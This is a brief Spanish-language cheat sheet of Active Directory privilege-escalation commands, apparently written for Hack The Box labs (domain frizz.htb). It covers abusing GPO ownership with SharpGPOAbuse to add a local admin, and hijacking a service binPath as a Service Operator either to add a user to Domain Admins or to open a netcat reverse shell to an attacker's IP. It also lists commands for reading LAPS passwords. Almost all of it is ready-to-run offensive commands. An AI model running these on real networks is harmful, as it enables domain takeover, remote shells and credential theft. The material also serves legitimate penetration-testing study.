Grupos para escalar en AD

CREAR GPOs PARA ESCALAR (por ejemplo si somos miembros de GPO owners)

New-GPO -Name "hacker"
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount USER --GPOName hacker
gpupdate /force

Service Operators

Listamos los servicios con:

services
sc config servicePATH binPath="cmd.exe /c net group 'Domain Admins' usuarioPwned /add /domain"

||

sc.exe config servicePATH binPath="C:\Users\svc-printer\AppData\Local\Temp\nc.exe -e cmd.exe IP PUERTO"
sc.exe stop serviceName
sc.exe start serviceName

LAPS readers

Pueden leer todas las contraseñas

Get-ADComputer -Filter ‘ObjectClass -eq “computer”’ -Property *
netstat -ano | FindStr /I "Pwd"

Protected Users/Objects

Obliga al usuario a usar solo los métodos más seguros (Kerberos AES) y bloquea los débiles (NTLM, RC4).